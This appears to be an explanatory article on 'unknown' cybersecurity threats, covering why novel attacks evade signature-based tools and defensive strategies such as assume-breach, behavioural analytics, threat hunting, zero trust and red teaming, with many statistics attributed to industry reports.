The Spectrum of Unknowns
In cybersecurity, “unknown threats” (often called “unknown unknowns”) represent attacks, vulnerabilities, or tactics that organizations aren’t yet aware of and therefore cannot explicitly defend against. Unlike known threats with established signatures or patterns, unknown threats operate outside existing security frameworks, making them particularly dangerous. According to IBM’s 2023 Cost of a Data Breach Report, breaches involving previously unknown techniques cost organizations an average of 37% more to remediate than those using known attack methods.
Security professionals typically categorize threats along a spectrum of knowability:
Known Knowns: Threats we’re aware of and understand, such as common malware variants or well-documented attack techniques. These can be addressed with signature-based defenses and established security practices.
Known Unknowns: Threats we’re aware might exist but lack complete information about. For example, we know zero-day vulnerabilities exist in software, but don’t know exactly what they are until discovered. These require proactive security measures and assumption of breach mentality.
Unknown Unknowns: Entirely novel threats we haven’t yet conceived of or anticipated. These represent the most challenging security problems because we can’t design specific defenses against what we can’t imagine. A Ponemon Institute study found that 68% of CISOs consider unknown threats their most significant security concern.
The Invisible Danger
Several factors make unknown threats especially challenging for security teams:
Bypassing Conventional Defenses: Traditional security tools like antivirus, firewalls, and intrusion detection systems rely heavily on signatures, rules, and known indicators of compromise. Unknown threats, by definition, don’t match these patterns. Gartner research indicates that conventional security tools detect less than 5% of novel attack techniques during their initial appearance.
Extended Dwell Time: Without specific detection capabilities, unknown threats often remain active in networks for extended periods. FireEye’s M-Trends report found that the median dwell time for attacks using previously unseen techniques was 273 days—more than twice the average for all breaches.
Difficult Attribution: Novel attack techniques often make it harder to identify the threat actors behind them, complicating response and risk assessment. According to the SANS Institute, security teams successfully attribute only 31% of attacks involving unknown techniques, compared to 76% of attacks using known methods.
Where Unknown Threats Emerge
Unknown threats emerge from various sources in today’s complex digital landscape:
Advanced Persistent Threats (APTs): Nation-state actors and sophisticated criminal groups continuously develop novel techniques to evade detection. The SolarWinds supply chain attack of 2020 utilized multiple previously unknown techniques, affecting thousands of organizations before discovery.
Emerging Technologies: New technologies introduce unforeseen vulnerabilities and attack surfaces. When cloud computing first gained mainstream adoption, organizations faced numerous unknown threats specific to this new paradigm. According to Gartner, 63% of security incidents involving emerging technologies exploit previously unknown vulnerabilities or attack vectors.
AI and Adversarial Machine Learning: As artificial intelligence advances, so do AI-powered attacks. Adversaries are developing techniques to manipulate or fool security AI systems in ways we haven’t yet anticipated. The World Economic Forum’s 2023 Global Risks Report identified AI-enhanced attacks as a critical emerging threat landscape with numerous unknown elements.
Interdependent Systems: As systems become more interconnected, novel threats can emerge from unexpected interactions between components. The 2023 CISA advisory on connected industrial systems highlighted that approximately 79% of critical infrastructure vulnerabilities stemmed from unexpected system interactions rather than individual component flaws.
Building Resilience Against the Unknown
While unknown threats can’t be specifically prevented, organizations can implement strategies to improve resilience and detection capabilities:
Assume Breach Mentality: Operating under the assumption that unknown threats have already penetrated defenses drives more robust security practices. This approach emphasizes detection, containment, and response rather than relying solely on prevention. Organizations adopting an assume breach model detected breaches 61% faster than those focused primarily on perimeter defense, according to Microsoft Security Intelligence.
Behavioral Analytics and Anomaly Detection: Rather than looking for known signatures, these approaches establish baselines of normal behavior and flag deviations. By focusing on behavior rather than specific indicators, they can potentially identify unknown threats based on their unusual activities. A Forrester report found that organizations using advanced behavioral analytics detected 73% more novel threats than those relying on traditional security tools.
Threat Hunting: Proactively searching for threats that have evaded automated detection can uncover unknown threats before they cause significant damage. According to the SANS Institute, organizations with dedicated threat hunting teams identified unknown threats an average of 88 days earlier than those without such capabilities.
Zero Trust Architecture: Implementing zero trust principles—never trust, always verify—can limit the impact of unknown threats by constraining lateral movement and privileges. Even when novel attack techniques succeed in initial access, zero trust controls can significantly reduce their ability to reach critical assets. Gartner research indicates that organizations implementing mature zero trust frameworks experience 72% less impact from previously unknown attack techniques.
The Human Element
Technology alone cannot address unknown threats—building adaptable security teams is equally crucial:
Continuous Learning: Security teams must constantly update their knowledge and skills to better recognize emerging patterns that might indicate novel threats. Organizations that invested in at least 40 hours of annual training for security staff identified unknown threats 57% more frequently than those with minimal training programs, according to (ISC)² research.
Red Team Exercises: Regular adversarial simulations help security teams think like attackers and identify blindspots in defenses before real adversaries do. IBM Security found that organizations conducting quarterly red team exercises were 68% more effective at detecting novel attack techniques during actual incidents.
Diverse Expertise: Building security teams with diverse backgrounds and perspectives increases the collective ability to anticipate previously unconsidered threats. McKinsey research showed that organizations with diverse security teams identified 29% more potential unknown threats during risk assessment exercises than homogeneous teams.
Navigating Uncertainty
Unknown threats are an inevitable aspect of cybersecurity. No organization can predict every possible attack vector or vulnerability that might emerge. However, by building adaptable defenses, focusing on behavior rather than signatures, and fostering resilient security cultures, organizations can significantly improve their ability to detect and respond to these threats before they cause substantial damage.
As the NIST Cybersecurity Framework emphasizes, security is not a destination but a continuous process. By acknowledging the existence of unknown threats and implementing strategies designed for uncertainty, organizations can navigate an ever-changing threat landscape with greater confidence and resilience.
